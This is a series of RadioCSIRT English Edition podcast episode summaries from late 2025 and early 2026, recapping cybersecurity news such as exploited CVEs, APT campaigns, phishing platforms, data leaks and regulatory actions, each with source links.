RadioCSIRT - English Edition

We open this recap with the Winter Olympic Games in Milano Cortina, facing a wave of cyberattacks attributed to Russia. According to The Register, Italy’s Minister of Foreign Affairs confirmed the targeting of diplomatic offices and Olympic infrastructure. The defensive posture is further strained by supply chain tensions, as Cloudflare’s CEO threatened to withdraw pro bono protection services following a regulatory dispute with Italian authorities.In France, ZDNet reported an espionage case in Gironde involving a clandestine interception station operated from a rented Airbnb property. Two Chinese nationals were charged. The seized equipment was designed for sniffing Starlink communications and intercepting military frequencies, illustrating direct risk at the physical communications layer.We then move to active exploitation and emergency response requirements around Cisco Catalyst SD-wan. Australia’s cyber authorities published an alert on exploitation of Cisco SD-wan appliances. Cisa added CVE 2026 20127 and CVE 2022 20775 to the Known Exploited Vulnerabilities catalog and issued Emergency Directive twenty-six zero three, requiring immediate inventory, forensic artifact collection, patching, and compromise assessment, with a deadline of February twenty-seventh, twenty twenty-six. certfr confirmed active exploitation through alert certfr twenty twenty-six ALE zero zero two, and BleepingComputer reported exploitation activity dating back to twenty twenty-three.On the malware front, multiple campaigns highlight attacker focus on routers, developers, and stealth tooling. Cisco Talos detailed the dismantling of the DKnife interception framework used since twenty nineteen. Talos also documented the Dohdoor backdoor campaign using DNS over HTTPS through Cloudflare, delivered via DLL sideloading and process hollowing, with EDR bypass techniques involving syscall unhooking in ntdll dot dll. Kaspersky GReAT reported Arkanix Stealer operating as Malware as a Service, with both Python and C plus plus implementations, AES GCM communications, and indications of LLM-assisted development.Developer ecosystems remain a key battleground. Microsoft warned of fake Next dot js repositories used as job interview lures delivering in-memory JavaScript payloads, and GitLab banned one hundred thirty-one accounts linked to the Contagious Interview operation and the Wagemole scheme. Socket identified the SANDWORM underscore MODE campaign abusing at least nineteen malicious npm packages through typosquatting, including a module targeting AI coding assistants via malicious MCP server injection combined with prompt injection.We also cover phishing at industrial scale. As reported by KrebsOnSecurity, the Starkiller phishing as a service platform dynamically loads real login pages and acts as a reverse proxy, relaying keystrokes, form submissions, and session tokens through attacker infrastructure, effectively defeating multi-factor authentication by capturing the full authentication flow.Finally, critical vulnerabilities affected AI development environments. Check Point Research documented vulnerabilities in Anthropic’s Claude Code enabling command execution via project hooks, MCP consent bypass through project configuration, and clear-text exfiltration of Anthropic API keys by redirecting the ANTHROPIC underscore BASE underscore URL variable to an attacker-controlled endpoint. In parallel, Linux ecosystem updates included Linux seven point zero entering release candidate status, while incident response and law enforcement actions included Eurojust’s takedown of a fraudulent call centre in Dnipro.All  sources are available on https://www.radiocsirt.com/podcast/your-cybersecurity-news-for-saturday-february-28-2026-ep-71/Don’t think, patch!Your feedback is welcome.Email: radiocsirt@gmail.comWebsite:https://www.radiocsirt.comWeekly Newsletter:https://radiocsirtenglishedition.substack.com/

We open this weekly recap with a critical alert regarding the active exploitation of a Microsoft Office Zero-Day, CVE-2026-21509. According to CERT-UA, the Russian-linked group APT28 has integrated this flaw into phishing campaigns targeting Ukrainian administrations and several EU nations, utilizing a complex infection chain involving WebDAV and the Covenant post-exploitation framework. In a simultaneous blow to software supply chains, the official update mechanism for Notepad++ was hijacked by the state-sponsored actor Violet Typhoon to distribute malware. While threats against productivity tools rise, Mozilla is pivoting toward privacy by announcing that Firefox 148 will allow users to centrally disable all generative AI features.The infrastructure landscape faced significant pressure this week as the CISA issued a binding operational directive requiring federal agencies to retire all End-of-Life (EoL) equipment within 12 months, citing their role as persistent entry points for Edge-based attacks. Meanwhile, the AISURU botnet shattered global records by launching a hyper-volumetric DDoS attack peaking at 31.4 Tbps, fueled by 2 million compromised Android devices. On the regulatory front, the European Commission warned TikTok of potential fines reaching 6% of its global turnover for violating the Digital Services Act (DSA) through "addictive by design" features, while U.S. authorities successfully seized major piracy domains operated from Bulgaria.Regarding cyber-extortion, the group Scattered Lapsus ShinyHunters continues to defy traditional ransomware models by combining data theft with physical harassment and social engineering. In Germany, authorities warned of Signal account takeovers targeting high-profile individuals via fraudulent QR code pairing. To counter evolving threats, Microsoft unveiled a new scanner designed to detect backdoors within Large Language Models (LLMs), and the UK’s NCSC provided a strategic reality check on Cloud Security Posture Management (CSPM), emphasizing that while vital, these tools are only one piece of the broader cloud security puzzle.SourcesSaturday, January 31, 2026Clubic – https://www.clubic.com/actualite-598390-data-centers-ce-que-revele-la-premiere-reunion-a-bercy-sur-les-projets-en-cours-et-a-venir-en-france.htmlThe Record – https://therecord.media/bulgaria-piracy-sites-streaming-gaming-seized-usUnit 42 – https://unit42.paloaltonetworks.com/russian-cyberthreat-2026-winter-olympics/CERT Santé – https://cyberveille.esante.gouv.fr/alertes/grafana-cve-2026-21720-2026-01-29SANS ISC – https://isc.sans.edu/diary/rss/32668Sunday, February 1, 2026Google TAG – https://blog.google/threat-analysis-group/tag-bulletin-q4-2025/CERT-FR – https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0102/BleepingComputer – https://www.bleepingcomputer.com/news/security/mandiant-details-how-shinyhunters-abuse-sso-to-steal-cloud-data/The Hacker News – https://thehackernews.com/2026/01/iran-linked-redkitten-cyber-campaign.htmlMonday, February 2, 2026The Register – https://www.theregister.com/2026/02/02/russialinked_apt28_microsoft_office_bug/ The Hacker News – https://thehackernews.com/2026/02/notepad-official-update-mechanism.htmlBleepingComputer – https://www.bleepingcomputer.com/news/software/mozilla-will-let-you-turn-off-all-firefox-ai-features/SANS ISC – https://isc.sans.edu/diary/rss/32674Tuesday, February 3, 2026Zscaler ThreatLabz – https://www.zscaler.com/blogs/security-research/technical-analysis-anatsa-campaigns-android-banking-malware-active-googleEFF – https://www.encryptitalready.org/Centre canadien pour la cybersécurité – https://www.cyber.gc.ca/fr/alertes-avis/bulletin-securite-kubernetes-av26-078Wednesday, February 4, 2026CERT-FR – https://www.cert.ssi.gouv.fr/cti/CERTFR-2026-CTI-001/NCSC – https://www.ncsc.gov.uk/blog-post/cspm-silver-bullet-or-another-piece-in-the-cloud-puzzleThe Hacker News – https://thehackernews.com/2026/02/microsoft-develops-scanner-to-detect.htmlCISA – https://www.cisa.gov/news-events/alerts/2026/02/03/cisa-adds-four-known-exploited-vulnerabilities-catalogThursday, February 5, 2026The Record – https://therecord.media/cisa-gives-federal-agencies-one-year-end-of-life-devicesThe Hacker News – https://thehackernews.com/2026/02/aisurukimwolf-botnet-launches-record.htmlThe Register – https://www.theregister.com/2026/02/05/asia_government_spies_hacked_37_critical_networks/BleepingComputer – https://www.bleepingcomputer.com/news/security/hackers-compromise-nginx-servers-to-redirect-user-traffic/Friday, February 6, 2026KrebsOnSecurity – https://krebsonsecurity.com/2026/02/please-dont-feed-the-scattered-lapsus-shiny-hunters/BleepingComputer – https://www.bleepingcomputer.com/news/security/european-commission-says-tiktok-facing-fine-over-addictive-design/BleepingComputer – https://www.bleepingcomputer.com/news/security/germany-warns-of-signal-account-hijacking-targeting-senior-figures/CISA – https://www.cisa.gov/news-events/alerts/2026/02/05/cisa-adds-two-known-exploited-vulnerabilities-catalogDon’t think, patch!Your feedback is welcome.Email: radiocsirt@gmail.comWebsite: https://www.radiocsirt.comWeekly Newsletter: https://radiocsirtenglishedition.substack.com/

This week, the vulnerability floodgates opened. From an 11-year-old Telnet flaw to critical VMware exploits, the CISA KEV catalog is overflowing. But the biggest shocker? Operational security failures at the highest levels of government.In this episode of RadioCSIRT English Edition:🚨 Critical Patch Overload: A massive week for the CISA KEV catalog, featuring Oracle, VMware vCenter (CVSS 9.8), and a critical bypass in Fortinet.🦖 The Return of Sandworm: ESET uncovers "DynoWiper," a new malware targeting the Polish energy sector, marking the 10th anniversary of the Ukraine grid attack.🤖 OpSec Failures: The CISA Acting Director leaks classified docs to ChatGPT, and why your BitLocker keys might not be safe with Microsoft.🕸️ Botnet Consolidation: The Kimwolf botnet grows, potentially merging with Badbox 2.0 to control millions of Android devices.🇫🇷 Digital Sovereignty: France bids farewell to Teams and Zoom, deploying its sovereign "Visio" platform government-wide.Tune in for your weekly dose of critical cybersecurity intelligence.🔗 Links & Resources: https://www.radiocsirt.com/podcast/ep-69-cisas-kev-surge-sandworm-returns-the-chatgpt-leak/

We open this weekly recap with a massive Patch Tuesday from Microsoft, which addressed 114 vulnerabilities, including three zero-days; notably, CVE-2026-20805 is actively exploited in the wild. Infrastructure concerns continued as Cisco patched a critical AsyncOS zero-day exploited by Chinese APT actors, and AWS remediated a "CodeBreach" supply chain flaw in its console CI pipelines.In data privacy and regulation, France’s CNIL imposed a combined $48 million fine on Free and Free Mobile for security failures affecting 24 million subscribers. Meanwhile, Spanish energy giant Endesa disclosed a breach exposing the data of 22 million customers, and a massive scraping incident affected 17.5 million Instagram users.On the threat landscape, Check Point Research analyzed "Sicarii," a new ransomware operation likely acting as a false flag with confused ideological messaging. Physical "Quishing" (QR code phishing) campaigns are surging in France, and the infamous BreachForums hacking community suffered a taste of its own medicine with a leak of its user database. Finally, strategic cooperation strengthens as the UK unveils its Government Cyber Action Plan and Germany partners with Israel to build a "Cyber Dome" defense system.OSINT Sources:📊 Reports, Studies & StrategiesKaspersky Security Bulletin 2025 : https://www.kasbersky.com/about/press-releases/2025_kaspersky-financial-sector-faced-ai-blockchain-and-organized-crime-threats-in-2025SecurityScorecard (via KnowBe4) : https://www.knowbe4.com/hubfs/Financial-Sector-Threats-The-Shifting-Landscape.pdfENISA Threat Landscape 2025 : https://www.enisa.europa.eu/publications/enisa-threat-landscape-2025FS-ISAC : https://www.fsisac.com/knowledge/annual-navigating-cyber-2025-reportRESCO Courtage : https://www.resco-courtage.com/dora-reglementation-guide-complet-2025NCSC UK : https://www.ncsc.gov.uk/blog-post/government-cyber-action-plan-strengthening-resilience-across-uk🛡️ Vulnerabilities, Patch Tuesday & Security AdvisoriesMicrosoft Security Update Guide : https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-0628CISA (CVE-2025-8110) : https://www.cisa.gov/news-events/alerts/2026/01/12/cisa-adds-one-known-exploited-vulnerability-catalogCISA (CVE-2026-20805) : https://www.cisa.gov/news-events/alerts/2026/01/13/cisa-adds-one-known-exploited-vulnerability-catalogCERT-FR (MISP) : https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0030/CERT-FR (VMware) : https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0029/CERT-FR (MariaDB) : https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0028/CERT-FR (NetApp) : https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0027/CERT-FR (Google Pixel) : https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0026/Krebs on Security : https://krebsonsecurity.com/2026/01/patch-tuesday-january-2026-edition/Cisco Talos Intelligence : https://blog.talosintelligence.com/microsoft-patch-tuesday-january-2026/CERT Santé : https://cyberveille.esante.gouv.fr/alertes/palo-alto-cve-2026-0227-2026-01-15BleepingComputer (Cisco AsyncOS) : https://www.bleepingcomputer.com/news/security/cisco-finally-fixes-asyncos-zero-day-exploited-since-november/CyberPress (AWS Console) : https://cyberpress.org/aws-console-supply-chain-attack-github-hijackingcyber/⚠️ Data Leaks, Incidents & AttacksBleepingComputer (BreachForums) : https://www.bleepingcomputer.com/news/security/breachforums-hacking-forum-database-leaked-exposing-324-000-accounts/CyberPress (Instagram) : https://cyberpress.org/instagram-data-leak/Cybersecurity Dive (SitusAMC) : https://www.cybersecuritydive.com/news/hackers-steal-sensitive-data-major-banking-industry-vendor-situsamc/BleepingComputer (Endesa) : https://www.bleepingcomputer.com/news/security/spanish-energy-giant-endesa-discloses-data-breach-affecting-customers/BleepingComputer (Pax8) : https://www.bleepingcomputer.com/news/security/cloud-marketplace-pax8-accidentally-exposes-data-on-1-800-msp-partners/The Record (Anchorage Police) : https://therecord.media/anchorage-police-takes-servers-offline-after-third-party-attack🕵️ Threat Intelligence (APT, Ransomware, Phishing)Planet.fr (Quishing Scam) : https://www.planet.fr/societe-arnaque-a-la-fausse-carte-bancaire-par-courrier-le-mecanisme-du-quishing-qui-vise-vos-coordonnees.2992374.29336.htmlCheck Point Research (Sicarii) : https://research.checkpoint.com/2026/sicarii-ransomware-truth-vs-myth/Cisco Talos Intelligence (UAT-8837) : https://blog.talosintelligence.com/uat-8837/Malwarebytes (LinkedIn Phishing) : https://www.malwarebytes.com/blog/news/2026/01/phishing-scammers-are-posting-fake-account-restricted-comments-on-linkedin⚖️ Regulations, Sanctions & International CooperationThe Record (CNIL/Free Fine) : https://therecord.media/france-data-regulator-fineMalwarebytes (Datamasters Fine) : https://www.malwarebytes.com/blog/news/2026/01/data-broker-fined-after-selling-alzheimers-patient-info-and-millions-of-sensitive-profilesThe Record (Germany-Israel Deal) : https://therecord.media/germany-cyber-dome-israel🏛️ Institutional: AMSN / Monaco SpecialAMSN : https://amsn.gouv.mc/decouvrir-l-amsn/presentationCERT-MC : https://amsn.gouv.mc/cert-mcPrince's Government (Directory) : https://www.gouv.mc/Gouvernement-et-Institutions/Le-Gouvernement/Ministere-d-Etat/Agence-Monegasque-de-Securite-NumeriqueLégimonaco : https://legimonaco.mc/tnc/ordonnance/2015/12-23-5.664/ANSSI / cyber.gouv.fr : https://cyber.gouv.fr/actualites/signature-dun-nouveau-programme-de-cooperation-entre-lagence-monegasque-de-securitePrince's Government (FIRST Conference) : https://www.gouv.mc/Action-Gouvernementale/La-Securite/Actualites/L-Agence-Monegasque-de-Securite-Numerique-participe-a-la-36eme-conference-annuelle-du-Forum-of-Incident-Response-and-Security-TeamsDon’t think, just patch!Your feedback is welcome.Email: radiocsirt@gmail.comWebsite:https://www.radiocsirt.comWeekly Newsletter:https://radiocsirtenglishedition.substack.com/

We open this episode with a new physical mail scam campaign targeting bank customers in France, according to Planet.fr. The modus operandi begins with the receipt of a letter bearing the letterhead of a financial institution and containing a fake bank card equipped with a chip. The document instructs the recipient to scan a QR code to activate the card. This technique, known as “quishing,” redirects the victim to a malicious website designed to exfiltrate personal data and banking details. The phenomenon, already observed in neighboring European countries, is gaining ground in France. The cards display a high level of counterfeiting, including accurate reproduction of banks’ visual identities. Verifying the URL displayed after scanning the QR code is the first indicator of legitimacy. If information is entered on a fraudulent website, the recommended procedure includes immediately blocking the bank card, changing all passwords, and reporting the incident via the French Interior Ministry’s Perceval platform.Microsoft published CVE-2026-0628 in its Security Update Guide, concerning a high-severity vulnerability affecting Chromium’s WebView tag component, according to Neowin. The technical flaw, classified as “Insufficient policy enforcement,” allows an attacker who has convinced a user to install a malicious extension to inject scripts or HTML into a privileged page. Researcher Gal Weizman reported the vulnerability to Google in late November. Chrome version 143.0.7499.192 contains the upstream fix, which was integrated by Microsoft into Edge on January 10, 2026. Microsoft records the CVE in its Security Update Guide to provide authoritative downstream status to Edge customers. Canonical vulnerability trackers confirm that the upstream remediation threshold was set in the Chrome 143 stable release. Inventory and remediation efforts must cover all embedded Chromium runtimes and Electron applications, as updating the host browser does not protect these applications.The BreachForums hacking forum suffered a data leak exposing its user database table, according to BleepingComputer. On January 9, 2026, a site named after the ShinyHunters extortion gang published a 7Zip archive named breachedforum.7z. The archive contains the file databoose.sql, a MyBB database table comprising 323,988 member records, including display names, registration dates, IP addresses, and other internal information. Analysis shows that the majority of IP addresses resolve to a local loopback address, but 70,296 records contain public IP addresses. The latest registration date corresponds to August 11, 2025, the day the previous BreachForums was shut down following the arrest of certain alleged operators. The current administrator, known under the pseudonym N/A, acknowledged the leak, stating that a backup of the MyBB users table was temporarily exposed in an unsecured directory and downloaded once.Finally, a major data leak compromised the personal information of approximately 17.5 million Instagram users, according to CyberPress. The leak, initially reported by cybersecurity researchers at Malwarebytes, exposes contact information, making millions of users vulnerable to identity theft and targeted phishing attacks. The dataset appeared this week on a hacking forum, published by a threat actor using the pseudonym “Solonik.” The listing titled “INSTAGRAM.COM 17M GLOBAL USERS — 2024 API LEAK” contains 17.5 million records formatted in JSON and TXT files. The data was collected in late 2024 via an API leak that bypassed standard security measures. The exposed database includes full names, usernames, verified email addresses, phone numbers, user identifiers, and partial location data. The leak is classified as scraping, meaning automated data collection via public interfaces. As of January 10, 2026, Meta has not issued a formal statement regarding this leak.SourcesPlanet.fr – Bank card scam https://www.planet.fr/societe-arnaque-a-la-fausse-carte-bancaire-par-courrier-le-mecanisme-du-quishing-qui-vise-vos-coordonnees.2992374.29336.htmlMicrosoft Security Update Guide – CVE-2026-0628 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-0628 BleepingComputer – BreachForums database leak https://www.bleepingcomputer.com/news/security/breachforums-hacking-forum-database-leaked-exposing-324-000-accounts/ CyberPress – Instagram data leak https://cyberpress.org/instagram-data-leak/Don’t think, patch!Your feedback is welcome.Email: radiocsirt@gmail.comWebsite: https://www.radiocsirt.comWeekly Newsletter: https://radiocsirtenglishedition.substack.com/

We open this edition with a global overview of the current cyber threat landscape.The year twenty twenty five confirms a high and persistent level of cyber pressure on organizations, characterized by the convergence of critical technical vulnerabilities, structural dependencies on suppliers, and growing geopolitical tensions. Sector-wide analyses highlight a continuous expansion of attack surfaces, increased exploitation of digital supply chains, and sustained professionalization of malicious actors, whether criminal or state-sponsored.We then move on to an in-depth analysis of the financial sector, facing a dual structural threat.Reports from Kaspersky, ENISA, FS-ISAC, and KnowBe4 converge on a clear conclusion: nearly all major financial institutions have been affected by incidents involving third-party providers. This systemic exposure is accompanied by an intensification of geopolitically motivated attacks and APT operations targeting international banking infrastructures, notably for state financing or intelligence collection purposes.We also revisit several documented incidents illustrating this dynamic.The compromise of the banking vendor SitusAMC highlights the cascading effects of supply chain attacks.The attack claimed by the pro-Russian group NoName057(16) against La Poste fits into a logic of symbolic disruption linked to geopolitical tensions.Other recent cases reported by specialized media confirm the sustained exposure of the financial sector to attacks combining organized cybercrime and state-level objectives.Finally, we address the regulatory and organizational response to these threats.The DORA regulation represents a structuring step for the operational resilience of the European financial sector, but feedback shows that compliance alone is not sufficient to counter determined adversaries. Mastery of digital dependencies, visibility over third and fourth parties, and the strengthening of detection and response capabilities remain central challenges to limit systemic impact.ations.Sources:Sectoral Reports and Threat Analyses:Kaspersky Security Bulletin 2025 - Financial Sector: https://www.kaspersky.com/about/press-releases/2025_kaspersky-financial-sector-faced-ai-blockchain-and-organized-crime-threats-in-2025ENISA Threat Landscape 2025 - Finance Sector: https://www.enisa.europa.eu/publications/enisa-threat-landscape-2025FS-ISAC - Navigating Cyber 2025: https://www.fsisac.com/knowledge/annual-navigating-cyber-2025-reportKnowBe4 - Financial Sector Threats: The Shifting Landscape: https://www.knowbe4.com/hubfs/Financial-Sector-Threats-The-Shifting-Landscape.pdfDocumented Incidents and Compromises:Cybersecurity Dive - SitusAMC Banking Vendor Breach: https://www.cybersecuritydive.com/news/hackers-steal-sensitive-data-major-banking-industry-vendor-situsamc/The Record (Recorded Future) - NoName057(16) Attack on La Poste: https://therecord.media/pro-russian-hackers-claim-attack-french-postal-service-la-posteAmerican Banker - Marquis Breach (Carter Pape): https://www.muckrack.com/carter-pape/articlesAttribution and State Threat Actors:Security Affairs - France Links APT28 to Government Attacks: https://securityaffairs.com/171234/apt/france-links-russian-apt28-attacks.htmlCompliance and Regulation:RESCO Courtage - Complete DORA Guide 2025: https://www.resco-courtage.com/dora-reglementation-guide-complet-2025L'Usine Digitale - 2025 Cyberattacks and Lessons Learned: https://www.usine-digitale.fr/article/les-cyberattaques-qui-ont-marque-l-annee-2025-et-les-lecons-a-en-tirer.htmlDon’t think, patch!Your feedback is welcome.Email: radiocsirt@gmail.comWebsite:https://www.radiocsirt.comWeekly Newsletter:https://radiocsirtenglishedition.substack.com/ 

We open this episode with a critical vulnerability in n8n reported by Security Online. CVE-2025-68668, with a CVSS score of 9.9, allows an authenticated user to escape the Python sandbox of the automation platform to execute arbitrary system commands, turning the Code Node into a vector for complete host system compromise.CVEfeed.io reports an uncontrolled DLL loading flaw in AsusSoftwareManagerAgent. CVE-2025-12793, rated 8.5 in CVSS 4.0, exploits an untrusted search path allowing a local attacker to execute arbitrary code through DLL Namespace manipulation.Clubic covers the disappearance of Anna's Archive's primary domain. The registry placed annas-archive.org under serverHold status two weeks after uploading 300 terabytes of Spotify data, suggesting legal action by the Public Interest Registry following OCLC's lawsuit for extracting 2.2 terabytes of WorldCat data.Phoronix reports a critical situation for the Debian project: the three delegated members of the Data Protection Team resigned simultaneously, leaving the project without an active team to manage GDPR obligations. Project leader Andreas Tille now handles this role ad-hoc while awaiting new volunteers.Finally, CERT-FR issued advisory CERTFR-2026-AVI-0004 concerning CVE-2025-13699 affecting multiple MariaDB branches. The vendor has not specified the exact nature of the security issue but recommends updating to versions 10.11.15, 10.6.24, 11.4.9, or 11.8.4.Sources: Security Online – n8n CVE-2025-68668: https://securityonline.info/n8n-sandbox-escape-how-cve-2025-68668-turns-workflows-into-weapons/CVEfeed.io – CVE-2025-12793 ASUS: https://cvefeed.io/vuln/detail/CVE-2025-12793Clubic – Anna's Archive domain: https://www.clubic.com/actualite-593797-le-site-qui-avait-pirate-spotify-perd-son-nom-de-domaine.htmlPhoronix – Debian Data Protection Team: https://www.phoronix.com/news/No-Debian-Data-Protection-TeamCERT-FR – MariaDB Vulnerability: https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0004/Don’t think, patch!Your feedback is welcome.Email: radiocsirt@gmail.comWebsite: https://www.radiocsirt.comWeekly Newsletter: https://radiocsirtenglishedition.substack.com/

Welcome to your daily cybersecurity podcast.We open this edition with an analysis published by FIRST dot org on December 29, 2025, presenting the annual review of vulnerability forecasts for the year 2025. The article, written by Éireann Leverett, confirms the validation of Vuln4Cast project forecasts with 49,183 CVEs published as of December 29, falling within the confidence interval of 41,142 to 49,868 CVEs established in February 2025. The MAPE of 1 point 39 percent against the upper bound demonstrates excellent accuracy of the forecast models.The quarterly forecasts for Q4 2025 are also validated with 12,359 CVEs published, within the confidence interval of 11,815 to 14,129 CVEs. This accuracy below 5% demonstrates that quarterly forecasts are sufficiently reliable for operational planning by patch management teams, SOCs, and CERTs.The article highlights the expansion of the vulnerability forecasting ecosystem with CVEForecast dot org developed by Jerry Gamblin at Cisco using XGBoost, and CIRCL Luxembourg's Vulnerability-Lookup platform which adds sightings tracking and comprehensive statistics. Future developments will focus on forecasting vendor distributions, CVSS vectors, CWEs, and vulnerability exploitability. Improvements are underway in six areas: CWE root cause analysis, exploit prediction, exploitation prediction, CNA forecasting, CVSS vector forecasting, and CVSS score prediction.FIRST announces the VulnOptiCon 2026 conference in Luxembourg, hosted by CIRCL, to enable the community to share methodologies and collectively advance exposure science and predictive security.SourceFIRST – 2025 Vulnerability Forecast Annual Review: https://www.first.org/blog/20251229-Vulnerability-Forecast-ReviewDon’t think, patch!Your feedback is welcome.Email: radiocsirt@gmail.comWebsite: https://www.radiocsirt.comWeekly Newsletter: https://radiocsirtenglishedition.substack.com/

Welcome to your daily cybersecurity podcast.We open this edition with several security advisories published by CERT-FR regarding critical vulnerabilities affecting major components of the Linux ecosystem and enterprise environments. The bulletins notably concern Ubuntu, Red Hat, and IBM products, which are exposed to flaws that may allow privilege escalation, arbitrary code execution, or compromise of confidentiality. These vulnerabilities affect widely deployed components in server and cloud infrastructures, highlighting the need for rigorous patch management in critical environments.We then analyze a vulnerability affecting the Roundcube webmail, referenced as CVE-2025-68461. This flaw allows a remote attacker to exploit input handling mechanisms in order to compromise session security or execute malicious code in the context of the targeted user. Given the widespread use of Roundcube in email infrastructures, this vulnerability represents a significant risk for Internet-exposed organizations.Finally, we review a security vulnerability patched by Microsoft, identified as CVE-2025-13699. This flaw affects a Windows system component and may be exploited to bypass security mechanisms or gain elevated privileges. Microsoft has released fixes through its update guide and recommends prompt application to reduce the risk of active exploitation.SourcesCERT-FR – Ubuntu vulnerabilities: https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-1139/CERT-FR – Red Hat vulnerabilities: https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-1141/CERT-FR – IBM product vulnerabilities: https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-1137/Roundcube vulnerability – CVE-2025-68461:https://cyberveille.esante.gouv.fr/alertes/roundcube-cve-2025-68461-2025-12-26 Microsoft – CVE-2025-13699:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-13699Don’t think, patch!Your feedback is welcome.Email: radiocsirt@gmail.comWebsite: https://www.radiocsirt.comWeekly Newsletter: https://radiocsirtenglishedition.substack.com/

Welcome to your daily cybersecurity podcast.We open this edition with a case combining cybercrime and intelligence activities in Eastern Europe. In Georgia, the former head of counterintelligence has been arrested as part of an investigation into large-scale scam centers. Authorities suspect he facilitated or protected structured fraud operations targeting international victims, once again highlighting the convergence of organized crime, corruption, and cyber fraud.We then analyze a phishing campaign targeting cryptocurrency users through fake emails impersonating Grubhub. The messages promise a tenfold return on cryptocurrency sent by victims. Funds are immediately redirected to attacker-controlled wallets with no possibility of recovery, illustrating a classic yet still highly effective use of social engineering applied to digital assets.Finally, we examine an operation attributed to Evasive Panda, a China-linked threat actor, which conducted espionage activities using a hijacked DNS infrastructure. The attackers leveraged advanced DNS resolution and traffic redirection techniques to deliver stealthy malicious payloads while bypassing multiple network detection mechanisms. This campaign highlights the continued evolution of APT tradecraft in state-sponsored cyber espionage.SourcesArrest in Georgia – scam centers:https://therecord.media/republic-of-georgia-former-spy-chief-arrested-scam-centersCrypto phishing campaign – fake Grubhub emails:https://www.bleepingcomputer.com/news/security/fake-grubhub-emails-promise-tenfold-return-on-sent-cryptocurrency/Evasive Panda APT – malicious DNS infrastructure:https://thehackernews.com/2025/12/china-linked-evasive-panda-ran-dns.htmlDon’t think, patch! Your feedback is welcome.Email: radiocsirt@gmail.comWebsite: https://www.radiocsirt.comWeekly Newsletter: https://radiocsirtenglishedition.substack.com/

Welcome to your daily cybersecurity podcast.We open this edition with a geopolitical sequence marking a new phase in transatlantic tensions over digital regulation. The United States have imposed visa restrictions on several European figures involved in regulating technology platforms, including Thierry Breton, former European Commissioner. Washington justifies the decision by accusing European regulators of extraterritorial censorship, notably in the enforcement of the Digital Services Act. The European Union condemned the measure and requested formal explanations, citing an attack on its regulatory sovereignty.We then analyze CVE-2018-25154, a critical buffer overflow vulnerability affecting GNU Barcode version 0.99. The flaw, linked to the Code 93 encoding mechanism, enables arbitrary code execution through crafted input files. The CVSS 3.1 score is critical at 9.8, with high impact on confidentiality, integrity, and availability.We also review CVE-2023-36525, an unauthenticated Blind SQL Injection affecting the WPJobBoard WordPress plugin up to version 5.9.0. The vulnerability is remotely exploitable without privileges or user interaction and exposes affected sites to data leakage and persistent modification risks.In the cybercrime segment, the FBI seized the web3adspanels.org infrastructure, used as a backend to centralize stolen banking credentials from phishing campaigns. The infrastructure enabled account takeover operations against financial institutions and remained active until late 2025.We then cover Urban VPN Proxy, a free VPN browser extension whose recent versions implement interception and exfiltration of AI platform conversations, including prompts, responses, and session metadata, enabled by default.Finally, we address the active exploitation of CVE-2020-12812 on FortiGate firewalls, an older vulnerability still abused to bypass 2FA through inconsistencies between FortiGate and LDAP username case handling.SourcesTech regulation and USA–EU tensions:https://www.01net.com/actualites/pourquoi-les-etats-unis-sattaquent-a-thierry-breton-et-aux-autres-regulateurs-de-la-tech.htmlCVE-2018-25154 – GNU Barcode buffer overflow:https://cvefeed.io/vuln/detail/CVE-2018-25154CVE-2023-36525 – WPJobBoard Blind SQL Injection:https://cvefeed.io/vuln/detail/CVE-2023-36525FBI Seizure – web3adspanels.org:https://securityaffairs.com/186094/cyber-crime/fbi-seized-web3adspanels-org-hosting-stolen-logins.htmlUrban VPN Proxy data harvesting:https://boingboing.net/2025/12/19/this-free-vpn-is-a-massive-security-risk.htmlFortiGate 2FA bypass exploitation:https://cyberpress.org/hackers-abuse-3-year-old-fortigate-flaw/Don’t think, patch!Your feedback is welcome.Email: radiocsirt@gmail.comWebsite: https://www.radiocsirt.comWeekly Newsletter: https://radiocsirtenglishedition.substack.com/

Welcome to your daily cybersecurity podcast.A new initiative brings together volunteer cybersecurity experts to help protect water utilities against growing cyber threats. Experienced professionals from the DEF CON Franklin community are paired with water service providers across several U.S. states to conduct assessments, map operational technology (OT) environments, and implement security measures tailored to critical infrastructure constraints. This community-driven model aims to offset limited internal resources and improve resilience against targeted industrial cyberattacks.MongoDB has issued an urgent warning urging administrators to immediately patch a severe remote code execution vulnerability affecting components of its ecosystem. The flaw could allow unauthenticated attackers to execute arbitrary code on exposed Node.js servers. Proof-of-concept exploits are publicly available, significantly increasing the risk of real-world exploitation.Security researchers have uncovered a large-scale compromise campaign involving the PCPcat malware, which exploited critical flaws in Next.js and React server components. More than 59,000 servers were compromised within 48 hours, with attackers harvesting credentials, SSH keys, and environment variables while establishing persistent access using stealthy processes and tunnels.In France, La Poste and its banking subsidiary, La Banque Postale, suffered major service disruptions following a distributed denial-of-service (DDoS) attack during the holiday period. Several online services, including parcel tracking and digital banking, were rendered unavailable. Authorities stated that no customer data was compromised.Finally, security teams are monitoring increased risks linked to modern JavaScript server stacks, highlighting how the rapid adoption of frameworks such as React and Next.js has expanded the attack surface for automated, industrial-scale exploitation.Sources:Cyber Volunteers / Water Utility / MSSP : https://therecord.media/cyber-volunteer-water-utility-msspMongoDB – Severe RCE Patch Warning : https://www.bleepingcomputer.com/news/security/mongodb-warns-admins-to-patch-severe-rce-flaw-immediately/PCPcat – React/Next.js Servers Breach : https://thecyberexpress.com/pcpcat-react-servers-nextjs-breach/La Poste – Outage After a Cyber Attack : https://securityaffairs.com/186064/security/la-poste-outage-after-a-cyber-attack.htmlDon’t think, patch!Your feedback is welcome.Email: radiocsirt@gmail.comWebsite: https://www.radiocsirt.comWeekly Newsletter: https://radiocsirtenglishedition.substack.com/

